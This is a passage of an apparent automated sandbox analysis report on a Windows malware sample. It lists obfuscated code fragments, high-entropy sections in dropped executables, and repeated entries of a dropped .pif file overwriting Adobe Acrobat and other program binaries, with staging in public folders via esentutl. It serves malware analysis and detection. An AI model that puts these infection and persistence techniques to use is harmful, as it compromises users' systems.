Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02AFD5A0 push 02AFD5CCh; ret 4_2_02AFD5C4
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02B1C570 push 02B1C56Eh; ret 4_2_02B1C566
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02AFC56C push ecx; mov dword ptr [esp], edx 4_2_02AFC571
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02B0AAE0 push 02B0AB18h; ret 4_2_02B0AB10
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02B08AD8 push 02B08B10h; ret 4_2_02B08B08
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02B0AADF push 02B0AB18h; ret 4_2_02B0AB10
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02B64A50 push eax; ret 4_2_02B64B20
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02AFCBEC push 02AFCD72h; ret 4_2_02AFCD6A
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02B0886C push 02B088AEh; ret 4_2_02B088A6
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02AFC98E push 02AFCD72h; ret 4_2_02AFCD6A
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02AFC9DE push 02AFCD72h; ret 4_2_02AFCD6A
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02B0790C push 02B07989h; ret 4_2_02B07981
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02B06946 push 02B069F3h; ret 4_2_02B069EB
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02B06948 push 02B069F3h; ret 4_2_02B069EB
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02B05E7C push ecx; mov dword ptr [esp], edx 4_2_02B05E7E
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02B02F60 push 02B02FD6h; ret 4_2_02B02FCE
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Code function: 12_1_0041C40C push cs; iretd 12_1_0041C4E2
Source: Acrobat.exe.12.dr Static PE information: section name: .reloc entropy: 7.857629901541196
Source: setup.exe.12.dr Static PE information: section name: .rsrc entropy: 7.644733541214545
Source: Aut2exe.exe.12.dr Static PE information: section name: .rsrc entropy: 7.800655098270515
Source: Aut2exe_x64.exe.12.dr Static PE information: section name: .rsrc entropy: 7.800507924806883
Source: AutoIt3_x64.exe.12.dr Static PE information: section name: .reloc entropy: 7.943934980231315
Source: appvcleaner.exe.12.dr Static PE information: section name: .reloc entropy: 7.935643965778136
Source: SciTE.exe.12.dr Static PE information: section name: .reloc entropy: 7.9123163296469805
Source: IntegratedOffice.exe.12.dr Static PE information: section name: .reloc entropy: 7.926768905035472
Source: OfficeC2RClient.exe.12.dr Static PE information: section name: .reloc entropy: 7.716531028347558
Source: officesvcmgr.exe.12.dr Static PE information: section name: .reloc entropy: 7.937221399929087
Source: chrome_pwa_launcher.exe.12.dr Static PE information: section name: .reloc entropy: 7.940586616723075
Source: chrmstp.exe.12.dr Static PE information: section name: .reloc entropy: 7.941023886348422
Source: setup.exe0.12.dr Static PE information: section name: .reloc entropy: 7.941032370435357
Source: AppVClient.exe.12.dr Static PE information: section name: .reloc entropy: 7.936523067479569
Source: jucheck.exe.12.dr Static PE information: section name: .reloc entropy: 7.931078087310504
Source: jusched.exe.12.dr Static PE information: section name: .reloc entropy: 7.936052797736743
Source: FXSSVC.exe.12.dr Static PE information: section name: .reloc entropy: 7.942279833740998
Source: elevation_service.exe.12.dr Static PE information: section name: .reloc entropy: 7.943952204055294
Source: elevation_service.exe0.12.dr Static PE information: section name: .reloc entropy: 7.945964485826929
Source: 117.0.5938.132_chrome_installer.exe.12.dr Static PE information: section name: .reloc entropy: 7.93477484000238
Source: SensorDataService.exe.12.dr Static PE information: section name: .reloc entropy: 7.935383609926094
Source: Spectrum.exe.12.dr Static PE information: section name: .reloc entropy: 7.945453569107587
Source: identity_helper.exe.12.dr Static PE information: section name: .reloc entropy: 7.940737618189385
Source: setup.exe1.12.dr Static PE information: section name: .reloc entropy: 7.944730680089531
Source: msedgewebview2.exe.12.dr Static PE information: section name: .reloc entropy: 7.93656284710181
Source: AgentService.exe.12.dr Static PE information: section name: .reloc entropy: 7.937129466044474
Source: vds.exe.12.dr Static PE information: section name: .reloc entropy: 7.94107270673957
Source: VSSVC.exe.12.dr Static PE information: section name: .reloc entropy: 7.93954260709988
Source: wbengine.exe.12.dr Static PE information: section name: .reloc entropy: 7.941290670440269
Source: wmpnetwk.exe.12.dr Static PE information: section name: .reloc entropy: 7.946616363744485
Source: SearchIndexer.exe.12.dr Static PE information: section name: .reloc entropy: 7.945863668494267

Persistence and Installation Behavior

Source: C:\Windows\System32\alg.exe File created: C:\Windows\system32\config\systemprofile\AppData\Roaming\b2310dff430b0ac5.bin
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\alpha.pif
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\xpha.pif
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\Libraries\Jwsmvmdw.PIF
Source: C:\Users\user\AppData\Local\Temp\x.exe File created: C:\Users\Public\Libraries\wdmvmswJ.pif
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe Jump to behavior
